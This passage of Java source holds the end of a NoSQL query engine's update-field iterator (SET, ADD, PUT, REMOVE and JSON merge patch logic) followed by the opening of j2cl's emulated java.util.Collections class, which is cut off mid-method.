        }
    }

    private final UpdateKind theUpdateKind;

    private final PlanIter theInputIter;

    private final PlanIter thePosIter;

    private final PlanIter theNewValueIter;

    private final boolean theIsMRCounterDec;

    private final int theJsonMRCounterColPos;

    private final boolean theIsJsonMRCounterUpdate;

    private final int theTargetItemReg;

    private final boolean theCloneNewValues;

    public UpdateFieldIter(
        Expr e,
        UpdateKind kind,
        PlanIter inputIter,
        PlanIter posIter,
        PlanIter newValueIter,
        int targetItemReg,
        boolean cloneNewValues,
        boolean isMRCounterDec,
        int jsonMRCounterColPos,
        boolean isJsonMRCounterUpdate) {

        super(e, -1);
        theUpdateKind = kind;
        theInputIter = inputIter;
        thePosIter = posIter;
        theNewValueIter = newValueIter;
        theTargetItemReg = targetItemReg;
        theCloneNewValues = cloneNewValues;
        theIsMRCounterDec = isMRCounterDec;
        theJsonMRCounterColPos = jsonMRCounterColPos;
        theIsJsonMRCounterUpdate = isJsonMRCounterUpdate;
    }

    /*
     * FastExternalizable constructor. Field order must match
     * writeFastExternal() below.
     */
    public UpdateFieldIter(DataInput in, short serialVersion)
        throws IOException {

        super(in, serialVersion);
        short ordinal = readOrdinal(in, UpdateKind.VALUES_COUNT);
        theUpdateKind = UpdateKind.valueOf(ordinal);
        theInputIter = deserializeIter(in, serialVersion);
        thePosIter = deserializeIter(in, serialVersion);
        theNewValueIter = deserializeIter(in, serialVersion);
        theTargetItemReg = readPositiveInt(in, true);
        theCloneNewValues = in.readBoolean();
        theIsMRCounterDec = in.readBoolean();
        theJsonMRCounterColPos = in.readInt();
        theIsJsonMRCounterUpdate = in.readBoolean();
    }

    @Override
    public void writeFastExternal(DataOutput out, short serialVersion)
        throws IOException {

        super.writeFastExternal(out, serialVersion);
        out.writeShort(theUpdateKind.ordinal());
        serializeIter(theInputIter, out, serialVersion);
        serializeIter(thePosIter, out, serialVersion);
        serializeIter(theNewValueIter, out, serialVersion);
        out.writeInt(theTargetItemReg);
        out.writeBoolean(theCloneNewValues);
        out.writeBoolean(theIsMRCounterDec);
        out.writeInt(theJsonMRCounterColPos);
        out.writeBoolean(theIsJsonMRCounterUpdate);
    }

    @Override
    public PlanIterKind getKind() {
        return PlanIterKind.UPDATE_FIELD;
    }

    /*
     * Supplies the row being updated. The row is consulted when handling
     * json MR_COUNTER columns (see doSet() and updateMRCounter()).
     */
    public void setRow(RuntimeControlBlock rcb, RowImpl row) {
        UpdateFieldState state = (UpdateFieldState)rcb.getState(theStatePos);
        state.theRow = row;
    }

    @Override
    public void open(RuntimeControlBlock rcb) {

        rcb.setState(theStatePos, new UpdateFieldState());

        theInputIter.open(rcb);

        if (thePosIter != null) {
            thePosIter.open(rcb);
        }
        if (theNewValueIter != null) {
            theNewValueIter.open(rcb);
        }
    }

    @Override
    public void close(RuntimeControlBlock rcb) {

        PlanIterState state = rcb.getState(theStatePos);
        if (state == null) {
            return;
        }

        theInputIter.close(rcb);

        if (thePosIter != null) {
            thePosIter.close(rcb);
        }
        if (theNewValueIter != null) {
            theNewValueIter.close(rcb);
        }

        state.close();
    }

    @Override
    public void reset(RuntimeControlBlock rcb) {

        theInputIter.reset(rcb);

        if (thePosIter != null) {
            thePosIter.reset(rcb);
        }
        if (theNewValueIter != null) {
            theNewValueIter.reset(rcb);
        }

        PlanIterState state = rcb.getState(theStatePos);
        state.reset(this);
    }

    /*
     * Drives one full evaluation of this update clause: iterates over all
     * target items produced by theInputIter and applies the clause's update
     * kind to each. Returns true iff at least one item was actually updated.
     */
    @Override
    public boolean next(RuntimeControlBlock rcb) {

        UpdateFieldState state = (UpdateFieldState)rcb.getState(theStatePos);

        if (state.isDone()) {
            return false;
        }

        boolean more = theInputIter.next(rcb);

        if (!more) {
            state.done();
            return false;
        }

        boolean updated = false;

        while (more) {

            int inputReg = theInputIter.getResultReg();
            FieldValueImpl targetItem = rcb.getRegVal(inputReg);

            switch (theUpdateKind) {
            case SET: {
                if (doSet(rcb, state, targetItem, null)) {
                    updated = true;
                }
                break;
            }
            case ADD: {
                if (doAdd(rcb, targetItem)) {
                    updated = true;
                }
                break;
            }
            case PUT: {
                if (doPut(rcb, targetItem)) {
                    updated = true;
                }
                break;
            }
            case JSON_MERGE_PATCH: {
                if (doJsonMergePatch(rcb, state, targetItem)) {
                    updated = true;
                }
                break;
            }
            case REMOVE: {
                /*
                 * For each parent item, we must collect all the items to
                 * remove, before actually removing them. This is because
                 * removing the items immediately would invalidate the
                 * "iterator" in the path expr that produces these items.
                 */
                FieldValueImpl savedParentItem =
                    state.theParentItemContext.theParentItem;

                theInputIter.getParentItemContext(rcb,
                                                  state.theParentItemContext);

                FieldValueImpl parentItem =
                    state.theParentItemContext.theParentItem;
                int targetPos = state.theParentItemContext.theTargetPos;
                String targetKey = state.theParentItemContext.theTargetKey;

                if (rcb.getTraceLevel() >= 3) {
                    rcb.trace("Removing item :\n" + targetItem +
                              "\nfrom parent item :\n" + parentItem);
                }

                if (parentItem.isRecord() &&
                    !(parentItem instanceof JsonCollectionRowImpl)) {
                    throw new QueryException(
                        "Cannot remove fields from records.\n" +
                        "Field " + targetKey + "\nRecord:\n" + parentItem,
                        theLocation);
                }

                if (parentItem.isNull()) {
                    break;
                }

                if (savedParentItem == null ||
                    savedParentItem == parentItem) {

                    /* Same parent as before: keep accumulating. */
                    if (targetKey != null) {
                        assert(parentItem.isMap() ||
                               parentItem instanceof JsonCollectionRowImpl);
                        state.theKeysToRemove.add(targetKey);
                    } else {
                        assert(parentItem.isArray());
                        state.thePositionsToRemove.add(targetPos);
                    }
                } else {
                    /*
                     * New parent: flush the removals accumulated for the
                     * previous parent, then start collecting for this one.
                     */
                    if (doRemove(state, savedParentItem)) {
                        updated = true;
                    }

                    state.theKeysToRemove.clear();
                    state.thePositionsToRemove.clear();

                    if (targetKey != null) {
                        /*
                         * NOTE(review): unlike the branch above, this assert
                         * does not allow JsonCollectionRowImpl parents —
                         * confirm whether that case can reach this branch.
                         */
                        assert(parentItem.isMap());
                        state.theKeysToRemove.add(targetKey);
                    } else {
                        assert(parentItem.isArray());
                        state.thePositionsToRemove.add(targetPos);
                    }
                }

                break;
            }
            default:
                throw new QueryStateException(
                    "Unexpected kind of update clause: " + theUpdateKind);
            }

            more = theInputIter.next(rcb);
        }

        /* Flush removals collected for the last parent item, if any. */
        if (theUpdateKind == UpdateKind.REMOVE &&
            state.theParentItemContext.theParentItem != null &&
            !state.theParentItemContext.theParentItem.isNull()) {
            if (doRemove(state, state.theParentItemContext.theParentItem)) {
                updated = true;
            }
        }

        state.done();
        return updated;
    }

    /*
     * Applies a SET clause to targetItem inside its parent (record, map, or
     * array). If newTargetItem is null, the new value is computed here from
     * theNewValueIter. Returns true if the set was performed, false if it was
     * skipped (NULL parent or empty new-value expr).
     */
    private boolean doSet(
        RuntimeControlBlock rcb,
        UpdateFieldState state,
        FieldValueImpl targetItem,
        FieldValueImpl newTargetItem) {

        theInputIter.getParentItemContext(rcb, state.theParentItemContext);

        FieldValueImpl parentItem = state.theParentItemContext.theParentItem;
        int targetPos = state.theParentItemContext.theTargetPos;
        String targetKey = state.theParentItemContext.theTargetKey;

        if (parentItem.isNull()) {
            return false;
        }

        /* Expose the target item as the value of the $ variable. */
        if (theTargetItemReg >= 0) {
            rcb.setRegVal(theTargetItemReg, targetItem);
        }

        /*
         * If the SET targets a json column containing MRCounters (but is not
         * itself an MRCounter update), save the current counter values so
         * they can be re-inserted after the column is overwritten.
         */
        boolean copyMRCounters = false;
        List<TablePath> mrCounterPaths = null;
        List<FieldValueImpl> mrCounterVals = null;

        if (theJsonMRCounterColPos >= 0 && !theIsJsonMRCounterUpdate) {
            copyMRCounters = true;
            mrCounterPaths = state.theRow.getTable().
                getSchemaMRCounterPaths(theJsonMRCounterColPos);
            mrCounterVals =
                new ArrayList<FieldValueImpl>(mrCounterPaths.size());

            for (TablePath path : mrCounterPaths) {
                FieldValueImpl val = state.theRow.evaluateScalarPath(path, 0);
                mrCounterVals.add(val);
            }
        }

        if (newTargetItem == null) {

            /* No need to call theNewValueIter.next(rcb) more than once,
             * because the new-value expr is wrapped by a conditional array
             * constructor */
            boolean more = theNewValueIter.next(rcb);

            if (!more) {
                theNewValueIter.reset(rcb);
                return false;
            }

            int inputReg = theNewValueIter.getResultReg();
            newTargetItem = rcb.getRegVal(inputReg);

            if (theCloneNewValues && !newTargetItem.isAtomic()) {
                newTargetItem = newTargetItem.clone();
            }
        }

        if (rcb.getTraceLevel() >= 1) {
            rcb.trace("SET:\nParentItem =\n" + parentItem +
                      "\nTargetItem:\n" + targetItem +
                      "\nNewValue:\n" + newTargetItem +
                      "\ntarget pos = " + targetPos);
        }

        try {
            switch (parentItem.getType()) {
            case RECORD: {
                RecordValueImpl rec = (RecordValueImpl)parentItem;
                FieldDefImpl targetType;

                if (newTargetItem.isJsonNull()) {
                    newTargetItem = NullValueImpl.getInstance();
                }

                if (targetPos >= 0) {
                    targetType = rec.getFieldDef(targetPos);
                } else if (parentItem instanceof JsonCollectionRowImpl) {
                    /* json-collection fields are always typed as json */
                    targetType = FieldDefImpl.Constants.jsonDef;
                } else {
                    targetType = rec.getFieldDef(targetKey);
                }

                newTargetItem = CastIter.castValue(newTargetItem,
                                                   targetType,
                                                   theLocation);

                if (targetItem.isMRCounter()) {
                    /*
                     * MR counters are never replaced wholesale; the new value
                     * is applied as an increment/decrement, and putInternal
                     * bypasses the normal MR-counter write restriction.
                     */
                    newTargetItem = updateMRCounter(rcb, targetItem,
                                                    newTargetItem);
                    if (targetPos >= 0) {
                        rec.putInternal(targetPos, newTargetItem, false);
                    } else {
                        rec.putInternal(targetKey, newTargetItem, false);
                    }
                } else if (targetPos >= 0) {
                    rec.put(targetPos, newTargetItem);
                } else {
                    rec.put(targetKey, newTargetItem);
                }

                if (rcb.getTraceLevel() >= 1) {
                    rcb.trace("SET DONE:\nParentItem after update =\n" +
                              parentItem);
                }
                break;
            }
            case MAP: {
                MapValueImpl map = (MapValueImpl)parentItem;

                if (targetItem.isMRCounter()) {
                    FieldDefImpl targetType = targetItem.getDefinition();
                    newTargetItem = CastIter.castValue(newTargetItem,
                                                       targetType,
                                                       theLocation);
                    newTargetItem = updateMRCounter(rcb, targetItem,
                                                    newTargetItem);
                } else {
                    FieldDefImpl targetType = map.getElementDef();
                    newTargetItem = CastIter.castValue(newTargetItem,
                                                       targetType,
                                                       theLocation);
                }
                map.put(targetKey, newTargetItem);
                break;
            }
            case ARRAY: {
                ArrayValueImpl arr = (ArrayValueImpl)parentItem;
                FieldDefImpl targetType = arr.getElementDef();
                newTargetItem = CastIter.castValue(newTargetItem,
                                                   targetType,
                                                   theLocation);
                arr.set(targetPos, newTargetItem);
                break;
            }
            default:
                throw new QueryStateException(
                    "Field to SET is not contained in a record, map, or " +
                    "array");
            }

            /* Restore the saved json MR-counter values (see above). */
            if (mrCounterPaths != null && mrCounterVals != null &&
                copyMRCounters) {
                for (int i = 0; i < mrCounterPaths.size(); ++i) {
                    JsonDefImpl.insertMRCounterField(state.theRow,
                                                     mrCounterPaths.get(i),
                                                     mrCounterVals.get(i),
                                                     true);
                }
            }
        } catch (IllegalArgumentException e) {
            throw new QueryException(
                "SET operation failed. Cause: " + e.getMessage(),
                theLocation);
        }

        theNewValueIter.reset(rcb);
        return true;
    }

    /*
     * Applies newTargetItem as an increment (or decrement, if
     * theIsMRCounterDec) to the MR counter targetItem. Returns a clone of
     * targetItem with the delta applied; the original is not modified.
     */
    private FieldValueImpl updateMRCounter(
        RuntimeControlBlock rcb,
        FieldValueImpl targetItem,
        FieldValueImpl newTargetItem) {

        if (newTargetItem.isNull()) {
            throw new QueryException("Cannot set an MR_COUNTER field to NULL",
                                     theLocation);
        }

        FieldValueImpl diffVal;

        if (targetItem.isInteger()) {
            int diff = newTargetItem.castAsInt();
            diffVal = FieldDefImpl.Constants.integerDef.createInteger(diff);
            newTargetItem = targetItem.clone();
        } else if (targetItem.isLong()) {
            long diff = newTargetItem.castAsLong();
            diffVal = FieldDefImpl.Constants.longDef.createLong(diff);
            newTargetItem = targetItem.clone();
        } else {
            BigDecimal diff = newTargetItem.castAsDecimal();
            diffVal = FieldDefImpl.Constants.numberDef.createNumber(diff);
            newTargetItem = targetItem.clone();
        }

        /*
         * Get local region id for CRDT.
         *
         * A normal (non-MR) table may also have a CRDT field; updating a
         * CRDT always requires a non-zero region id.
         */
        int regionId;
        UpdateFieldState state = (UpdateFieldState)rcb.getState(theStatePos);
        if (state.theRow.isFromMRTable()) {
            regionId = Region.LOCAL_REGION_ID;
        } else if (Region.isMultiRegionId(rcb.getRegionId())) {
            regionId = rcb.getRegionId();
        } else {
            throw new IllegalArgumentException(
                "Update of an MR Counter field requires a region id");
        }

        if (!theIsMRCounterDec) {
            newTargetItem.incrementMRCounter(diffVal, regionId);
        } else {
            newTargetItem.decrementMRCounter(diffVal, regionId);
        }

        if (rcb.getTraceLevel() >= 3) {
            rcb.trace("Updating MR_COUNTER column. Current value = " +
                      targetItem + " new value = " + newTargetItem);
        }

        return newTargetItem;
    }

    /*
     * Applies an ADD clause: appends the values produced by theNewValueIter
     * to the target array, or inserts them at the position computed by
     * thePosIter (clamped to [0, size); out-of-range positions append).
     * Returns false if the target is not an array or there is nothing to add.
     */
    private boolean doAdd(RuntimeControlBlock rcb, FieldValueImpl targetItem) {

        if (!targetItem.isArray()) {
            return false;
        }

        ArrayValueImpl arr = (ArrayValueImpl)targetItem;
        FieldDefImpl elemDef = arr.getElementDef();

        /* Expose the target item as the value of the $ variable. */
        if (theTargetItemReg >= 0) {
            rcb.setRegVal(theTargetItemReg, targetItem);
        }

        /* pos == -1 means "append at the end". */
        int pos = -1;

        if (thePosIter != null) {

            boolean more = thePosIter.next(rcb);

            if (more) {
                FieldValueImpl posVal =
                    rcb.getRegVal(thePosIter.getResultReg());

                if (!posVal.isNumeric()) {
                    throw new QueryException(
                        "ADD operation failed. Cause: The position " +
                        "expression does not return a numeric item",
                        theLocation);
                }

                if (thePosIter.next(rcb)) {
                    throw new QueryException(
                        "ADD operation failed. Cause: The position " +
                        "expression returns more than one items",
                        theLocation);
                }

                if (!posVal.isInteger()) {
                    posVal = CastIter.castValue(
                        posVal,
                        FieldDefImpl.Constants.integerDef,
                        theLocation);
                }

                pos = posVal.getInt();

                if (pos < 0) {
                    pos = 0;
                }

                if (pos >= arr.size()) {
                    pos = -1;
                }
            }
        }

        if (rcb.getTraceLevel() >= 2) {
            rcb.trace("Adding item at position " + pos + " of array\n" + arr);
        }

        boolean more = theNewValueIter.next(rcb);

        if (!more) {
            theNewValueIter.reset(rcb);
            return false;
        }

        /*
         * The new value expr may be referencing the target array (e.g., via
         * the $ var). So, we must collect all the new elements from the new
         * value expr BEFORE updating the target array. Otherwise, if we
         * update the target array immediately, an iterator over the target
         * array that is maintained by the new value expr will be
         * invalidated, and as a result, calling theNewValueIter.next(rcb)
         * below may fail or result in an erroneous addition.
         */
        ArrayList<FieldValueImpl> values = new ArrayList<FieldValueImpl>();

        while (more) {
            FieldValueImpl val =
                rcb.getRegVal(theNewValueIter.getResultReg());

            if (theCloneNewValues && !val.isAtomic()) {
                val = val.clone();
            }

            val = CastIter.castValue(val, elemDef, theLocation);

            if (rcb.getTraceLevel() >= 2) {
                rcb.trace("Item to add:\n" + val);
            }

            values.add(val);
            more = theNewValueIter.next(rcb);
        }

        try {
            for (int i = 0; i < values.size(); ++i) {
                if (pos < 0) {
                    arr.add(values.get(i));
                } else {
                    arr.add(pos, values.get(i));
                    ++pos;
                }
            }

            if (rcb.getTraceLevel() >= 2) {
                rcb.trace("Target array after update:\n" + arr);
            }
        } catch (IllegalArgumentException e) {
            throw new QueryException(
                "ADD operation failed. Cause: " + e.getMessage(),
                theLocation);
        }

        if (thePosIter != null) {
            thePosIter.reset(rcb);
        }
        theNewValueIter.reset(rcb);
        return true;
    }

    /*
     * Applies a PUT clause: merges the fields of the maps/records produced
     * by theNewValueIter into the target map (or json-collection row).
     * Returns false if the target is not a map or there is nothing to put.
     */
    private boolean doPut(RuntimeControlBlock rcb, FieldValueImpl targetItem) {

        MapValueImpl map = null;

        if (targetItem instanceof JsonCollectionRowImpl) {
            JsonCollectionRowImpl srow = (JsonCollectionRowImpl) targetItem;
            map = srow.getJsonCollectionMap();
        } else {
            if (!targetItem.isMap()) {
                return false;
            }
            map = (MapValueImpl)targetItem;
        }

        FieldDefImpl elemDef = map.getElementDef();

        /* Expose the target item as the value of the $ variable. */
        if (theTargetItemReg >= 0) {
            rcb.setRegVal(theTargetItemReg, targetItem);
        }

        boolean more = theNewValueIter.next(rcb);

        if (!more) {
            theNewValueIter.reset(rcb);
            return false;
        }

        /*
         * The new value expr may be referencing the target map (e.g., via the
         * $ var). So, we must collect all the new fields from the new
         * value expr BEFORE updating the target map. Otherwise, if we
         * update the target map immediately, an iterator over the target
         * map that is maintained by the new value expr will be invalidated,
         * and as a result, calling theNewValueIter.next(rcb) below will fail.
*/ ArrayList<String> keys = new ArrayList<String>(); ArrayList<FieldValueImpl> values = new ArrayList<FieldValueImpl>(); while (more) { FieldValueImpl val = rcb.getRegVal(theNewValueIter.getResultReg()); if (val.isMap()) { MapValueImpl fromMap = (MapValueImpl)val; for (Map.Entry<String, FieldValue> entry : fromMap.getFields().entrySet()) { String fkey = entry.getKey(); FieldValueImpl fval = (FieldValueImpl)entry.getValue(); if (theCloneNewValues && !fval.isAtomic()) { fval = fval.clone(); } fval = CastIter.castValue(fval, elemDef, theLocation); keys.add(fkey); values.add(fval); } } else if (val.isRecord()) { RecordValueImpl fromRec = (RecordValueImpl)val; int numFields = fromRec.getNumFields(); for (int i = 0; i < numFields; ++i) { String fkey = fromRec.getFieldName(i); FieldValueImpl fval = fromRec.get(i); if (!fval.isAtomic()) { fval = fval.clone(); } fval = CastIter.castValue(fval, elemDef, theLocation); keys.add(fkey); values.add(fval); } } more = theNewValueIter.next(rcb); } theNewValueIter.reset(rcb); try { for (int i = 0; i < keys.size(); ++i) { String key = keys.get(i); if (targetItem instanceof JsonCollectionRowImpl) { JsonCollectionRowImpl srow = (JsonCollectionRowImpl) targetItem; if (srow.getTable().isKeyComponent(key)) { throw new QueryException( "Cannot put top-level field " + key + " in a json collection row, because its name " + "is the same as the name of a primary key column", theLocation); } } map.put(keys.get(i), values.get(i)); } } catch (IllegalArgumentException e) { throw new QueryException( "PUT operation failed. 
Cause: " + e.getMessage(), theLocation); } return !keys.isEmpty(); } private boolean doJsonMergePatch( RuntimeControlBlock rcb, UpdateFieldState state, FieldValueImpl targetItem) { boolean jsonRow = (targetItem instanceof JsonCollectionRowImpl); if (jsonRow) { JsonCollectionRowImpl srow = (JsonCollectionRowImpl) targetItem; targetItem = srow.getJsonCollectionMap(); } if (!targetItem.isJson() && !targetItem.isNull()) { throw new QueryException( "Target Item of json merge patch is not a json value", theInputIter.getLocation()); } boolean more = theNewValueIter.next(rcb); assert(more); int inputReg = theNewValueIter.getResultReg(); FieldValueImpl patch = rcb.getRegVal(inputReg); if (!patch.isJson()) { throw new QueryException( "The json merge patch is not a json value: " + patch, theNewValueIter.getLocation()); } if (!patch.isMap()) { if (jsonRow) { throw new QueryException( "If the target of a json merge patch clause is a " + "json collection row, the patch must be a json object", theNewValueIter.getLocation()); } return doSet(rcb, state, targetItem, patch); } if (jsonRow) { TableImpl table = state.theRow.getTable(); Map<String, FieldValue> patchMap = ((MapValueImpl)patch).getFields(); Set<String> patchFields = patchMap.keySet(); for (String patchField : patchFields) { if (table.isKeyComponent(patchField)) { throw new QueryException( "Cannot update a primary key column", theNewValueIter.getLocation()); } } } FieldValue newTargetItem = doJsonMergePatch(rcb, targetItem, patch); if (newTargetItem != targetItem) { return doSet(rcb, state, targetItem, (FieldValueImpl)newTargetItem); } return true; } private FieldValue doJsonMergePatch( RuntimeControlBlock rcb, FieldValue target, FieldValue patch) { if (target != null && ((FieldValueImpl)target).isMRCounter()) { throw new QueryException( "Cannot update MRCounter via json merge patch", theInputIter.getLocation()); } if (!patch.isMap()) { return patch; } if (target == null || !target.isMap()) { target = 
FieldDefImpl.Constants.mapJsonDef.createMap(); } MapValueImpl targetMap = (MapValueImpl)target; Map<String, FieldValue> patchMap = ((MapValueImpl)patch).getFields(); for (Map.Entry<String, FieldValue> entry : patchMap.entrySet()) { String key = entry.getKey(); FieldValue value = entry.getValue(); if (value.isJsonNull()) { targetMap.remove(key); } else { FieldValue newValue = doJsonMergePatch(rcb, targetMap.get(key), value); targetMap.put(key, newValue); } } return target; } boolean doRemove( UpdateFieldState state, FieldValueImpl parentItem) { boolean copyMRCounters = false; List<TablePath> mrCounterPaths = null; List<FieldValueImpl> mrCounterVals = null; if (theJsonMRCounterColPos >= 0) { copyMRCounters = true; mrCounterPaths = state.theRow.getTable(). getSchemaMRCounterPaths(theJsonMRCounterColPos); mrCounterVals = new ArrayList<FieldValueImpl>(mrCounterPaths.size()); for (TablePath path : mrCounterPaths) { FieldValueImpl val = state.theRow.evaluateScalarPath(path, 0); mrCounterVals.add(val); } } if (parentItem.isMap() || parentItem instanceof JsonCollectionRowImpl) { MapValueImpl map; if (parentItem.isMap()) { map = (MapValueImpl)parentItem; } else { JsonCollectionRowImpl srow = (JsonCollectionRowImpl)parentItem; map = srow.getJsonCollectionMap(); } if (state.theKeysToRemove.isEmpty()) { return false; } for (String key : state.theKeysToRemove) { map.remove(key); } } else { ArrayValueImpl arr = (ArrayValueImpl)parentItem; int numRemoved = 0; for (Integer pos : state.thePositionsToRemove) { int adjustedPos = pos.intValue() - numRemoved; arr.remove(adjustedPos); ++numRemoved; } if (numRemoved == 0) { return false; } } if (mrCounterPaths != null && mrCounterVals != null && copyMRCounters) { for (int i = 0; i < mrCounterPaths.size(); ++i) { JsonDefImpl.insertMRCounterField(state.theRow, mrCounterPaths.get(i), mrCounterVals.get(i), true); } } return true; } @Override protected void displayContent( StringBuilder sb, DisplayFormatter formatter, boolean verbose) { if 
// (continuation of displayContent: emits this iterator's configuration and its
// child iterators in the query-plan display format)
(verbose && theTargetItemReg >= 0) {
    formatter.indent(sb);
    sb.append("\"register for $ variable\" : ").append(theTargetItemReg);
    sb.append(",\n");
}
formatter.indent(sb);
sb.append("\"clone new values\" : ").append(theCloneNewValues);
sb.append(",\n");
formatter.indent(sb);
sb.append("\"theIsMRCounterDec\" : ").append(theIsMRCounterDec);
sb.append(",\n");
formatter.indent(sb);
sb.append("\"theJsonMRCounterColPos\" : ").append(theJsonMRCounterColPos);
sb.append(",\n");
formatter.indent(sb);
sb.append("\"theIsJsonMRCounterUpdate\" : ").append(theIsJsonMRCounterUpdate);
sb.append(",\n");
formatter.indent(sb);
sb.append("\"target iterator\" :\n");
theInputIter.display(sb, formatter, verbose);
// The position and new-value iterators are optional, so only display them
// when present.
if (thePosIter != null) {
    sb.append(",\n");
    formatter.indent(sb);
    sb.append("\"position iterator\" :\n");
    thePosIter.display(sb, formatter, verbose);
}
if (theNewValueIter != null) {
    sb.append(",\n");
    formatter.indent(sb);
    sb.append("\"new value iterator\" :\n");
    theNewValueIter.display(sb, formatter, verbose);
}
}

// The display name of this plan iterator is its update kind.
@Override
void displayName(StringBuilder sb) {
    sb.append(theUpdateKind);
}

// Structural equality: compares the update kind, the three child iterators,
// and all configuration flags/positions, on top of the superclass state.
@Override
public boolean equals(Object obj) {
    if (this == obj) {
        return true;
    }
    if (!super.equals(obj) || !(obj instanceof UpdateFieldIter)) {
        return false;
    }
    final UpdateFieldIter other = (UpdateFieldIter) obj;
    return (theUpdateKind == other.theUpdateKind) &&
        Objects.equals(theInputIter, other.theInputIter) &&
        Objects.equals(thePosIter, other.thePosIter) &&
        Objects.equals(theNewValueIter, other.theNewValueIter) &&
        (theIsMRCounterDec == other.theIsMRCounterDec) &&
        (theJsonMRCounterColPos == other.theJsonMRCounterColPos) &&
        (theIsJsonMRCounterUpdate == other.theIsJsonMRCounterUpdate) &&
        (theTargetItemReg == other.theTargetItemReg) &&
        (theCloneNewValues == other.theCloneNewValues);
}

// Hash code is computed over exactly the fields compared in equals above,
// keeping the two methods consistent.
@Override
public int hashCode() {
    return Objects.hash(super.hashCode(), theUpdateKind, theInputIter,
                        thePosIter, theNewValueIter, theIsMRCounterDec,
                        theJsonMRCounterColPos, theIsJsonMRCounterUpdate,
                        theTargetItemReg,
                        theCloneNewValues);
}
}
google/j2cl
35,573
jre/java/java/util/Collections.java
/* * Copyright 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package java.util; import static javaemul.internal.InternalPreconditions.checkArgument; import static javaemul.internal.InternalPreconditions.checkElementIndex; import static javaemul.internal.InternalPreconditions.checkNotNull; import static javaemul.internal.InternalPreconditions.isApiChecked; import java.io.Serializable; import java.util.Map.Entry; import java.util.function.Predicate; import java.util.function.UnaryOperator; import jsinterop.annotations.JsMethod; import jsinterop.annotations.JsNonNull; /** * Utility methods that operate on collections. See <a * href="https://docs.oracle.com/javase/8/docs/api/java/util/Collections.html">the official Java API * doc</a> for details. 
*/ public class Collections { private static final class LifoQueue<E> extends AbstractQueue<E> implements Serializable { private final Deque<E> deque; LifoQueue(Deque<E> deque) { this.deque = deque; } @Override public Iterator<E> iterator() { return deque.iterator(); } @Override public boolean offer(E e) { return deque.offerFirst(e); } @Override public E peek() { return deque.peekFirst(); } @Override public E poll() { return deque.pollFirst(); } @Override public int size() { return deque.size(); } } private static final class EmptyList extends AbstractList implements RandomAccess, Serializable { @Override public boolean contains(Object object) { return false; } @Override public Object get(int location) { checkElementIndex(location, 0); return null; } @Override public Iterator iterator() { return emptyIterator(); } @Override public ListIterator listIterator() { return emptyListIterator(); } @Override public int size() { return 0; } } private static final class EmptyListIterator implements ListIterator { static final EmptyListIterator INSTANCE = new EmptyListIterator(); @Override public void add(Object o) { throw new UnsupportedOperationException(); } @Override public boolean hasNext() { return false; } @Override public boolean hasPrevious() { return false; } @Override public Object next() { throw new NoSuchElementException(); } @Override public int nextIndex() { return 0; } @Override public Object previous() { throw new NoSuchElementException(); } @Override public int previousIndex() { return -1; } @Override public void remove() { throw new IllegalStateException(); } @Override public void set(Object o) { throw new IllegalStateException(); } } private static final class EmptySet extends AbstractSet implements Serializable { @Override public boolean contains(Object object) { return false; } @Override public Iterator iterator() { return emptyIterator(); } @Override public int size() { return 0; } } private static final class EmptyMap extends AbstractMap implements 
Serializable { @Override public boolean containsKey(Object key) { return false; } @Override public boolean containsValue(Object value) { return false; } @Override public Set entrySet() { return EMPTY_SET; } @Override public Object get(Object key) { return null; } @Override @JsNonNull public Set keySet() { return EMPTY_SET; } @Override public int size() { return 0; } @Override public @JsNonNull Collection values() { return EMPTY_LIST; } } private static final class SetFromMap<E> extends AbstractSet<E> implements Serializable { private final Map<E, Boolean> backingMap; private Set<E> keySet; SetFromMap(Map<E, Boolean> map) { backingMap = map; } @Override public boolean add(E e) { return backingMap.put(e, Boolean.TRUE) == null; } @Override public void clear() { backingMap.clear(); } @Override public boolean contains(Object o) { return backingMap.containsKey(o); } @Override public boolean equals(Object o) { return o == this || keySet().equals(o); } @Override public int hashCode() { return keySet().hashCode(); } @Override public Iterator<E> iterator() { return keySet().iterator(); } @Override public boolean remove(Object o) { return backingMap.remove(o) != null; } @Override public int size() { return keySet().size(); } @Override public String toString() { return keySet().toString(); } /** Lazy initialize keySet to avoid NPE after deserialization. */ private Set<E> keySet() { if (keySet == null) { keySet = backingMap.keySet(); } return keySet; } } private static final class SingletonList<E> extends AbstractList<E> implements Serializable { private E element; public SingletonList(E element) { this.element = element; } @Override public boolean contains(Object item) { return Objects.equals(element, item); } @Override public E get(int index) { checkElementIndex(index, 1); return element; } @Override public int size() { return 1; } } /* * Returns the input collection as it is. 
*/
// NOTE(review): in this JRE emulation every synchronized* factory simply
// returns its argument unchanged — presumably because the JS runtime is
// single-threaded, so there is no locking to emulate; confirm before relying
// on these for any real synchronization semantics.
public static <T> Collection<T> synchronizedCollection(Collection<T> c) {
  return c;
}

/** Returns the input list as it is (no synchronization wrapper is created). */
public static <T> List<T> synchronizedList(List<T> list) {
  return list;
}

/** Returns the input map as it is (no synchronization wrapper is created). */
public static <K, V> Map<K, V> synchronizedMap(Map<K, V> m) {
  return m;
}

/** Returns the input map as it is (no synchronization wrapper is created). */
public static <K, V> NavigableMap<K, V> synchronizedNavigableMap(NavigableMap<K, V> m) {
  return m;
}

/** Returns the input set as it is (no synchronization wrapper is created). */
public static <T> NavigableSet<T> synchronizedNavigableSet(NavigableSet<T> s) {
  return s;
}

/** Returns the input set as it is (no synchronization wrapper is created). */
public static <T> Set<T> synchronizedSet(Set<T> s) {
  return s;
}

/** Returns the input map as it is (no synchronization wrapper is created). */
public static <K, V> SortedMap<K, V> synchronizedSortedMap(SortedMap<K, V> m) {
  return m;
}

/** Returns the input set as it is (no synchronization wrapper is created). */
public static <T> SortedSet<T> synchronizedSortedSet(SortedSet<T> s) {
  return s;
}

/*
 * TODO: make the unmodifiable collections serializable.
 */
// Read-only view over a backing collection: query methods delegate to
// {@code coll}; mutating methods throw UnsupportedOperationException.
static class UnmodifiableCollection<T> implements Collection<T> {
  protected final Collection<? extends T> coll;

  public UnmodifiableCollection(Collection<? extends T> coll) {
    this.coll = coll;
  }

  @Override
  public boolean add(T o) {
    throw new UnsupportedOperationException();
  }

  @Override
  public boolean addAll(Collection<?
